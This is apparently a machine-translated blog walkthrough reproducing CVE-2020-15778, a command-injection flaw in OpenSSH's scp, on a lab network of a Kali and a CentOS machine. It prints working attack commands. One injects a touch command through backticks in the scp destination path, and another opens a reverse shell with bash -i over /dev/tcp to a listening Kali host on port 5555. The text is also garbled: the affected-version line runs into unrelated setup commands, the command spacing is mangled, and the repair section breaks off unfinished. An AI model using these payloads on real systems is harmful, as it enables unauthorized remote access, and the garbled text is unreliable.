Shulou(Shulou.com)05/31 Report--

Today, I would like to talk to you about the recurrence of CVE-2020-15778 loopholes, which may not be well understood by many people. in order to make you understand better, the editor has summarized the following contents for you. I hope you can get something according to this article.

1. Vulnerability description

(1) introduction: researcher Chinmay Pandya discovered a loophole in Openssh on June 9, 2020, which was made public on July 18, 2020. Scp in OpenSSH's 8.3p1 allows commands to be injected into the scp.c remote function, which can be exploited by an attacker to execute arbitrary commands. This vulnerability belongs to the command execution vulnerability, and most linux systems are affected at present.

(2) scp introduction: scp is a secure remote file copy life based on ssh login under Linux, which is used to copy files and directories between different Linux systems. This command is implemented by scp.c of openssh and other related code. In the recurrence of this vulnerability, the scp command is used to transfer the files of a kali system to the Linux system.

(3) vulnerability type: command execution

(4) the version affected by the vulnerability: OpenSSH 1.txt / / input 123456 to the 1.txt file in the current directory scp 1.txt root@192.168.5.138:/tmp/h.txt / / copy the 1.txt file to the centos machine / tmp/h.txt file ssh@root192.168.5.138 / / directly use ssh to connect to the centos machine

The scp function is used normally, and the ssh connection to centos fails, which proves that the iptables policy (disable ssh login, keep only scp) is successful and valid.

4. Loophole recurrence

Prerequisite: you need to know the ssh account password of centos.

(1) check the ssh version of CentOS

Ssh-v

(2) first try to use the scp command to write a file to centOS with kali and copy the file.

Scp 1.txt root@192.168.5.138:' `touch / tmp/ test.txt` / tmp'

Successfully transfer the files above kali to Road centOS.

(3) listen to port 5555 on the Kali machine.

Nc-lvp 5555

(4) rebound shell

Scp test.txt root@192.168.5.138:' `bash-I > & / dev/tcp/192.168.5.130/5555 0 > & 1` / tmp/test1.txt'

(5) execute any system command in the listening interface of the Kali. for example, you can find the ip of the centos machine by using ifconfig.

5. Summary

Some people may think that they have already got the user name and password of ssh, so it would be better to just go in ssh. Recall that ssh login is disabled in the environment configuration, leaving only scp. Instead of using ssh connection directly, we call ssh through scp to complete the connection. The loophole has the advantages of simple reproduction, great harm, great limitation of utilization, and requires the user password of ssh. If we find the user name and password of the target user, and the target user turns off ssh but turns on scp, then we can take advantage of this vulnerability to bounce shell to gain privileges.

6. Vulnerability repair

(1) Test method enter the ssh-v command to view the openssh version such as the displayed version number

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.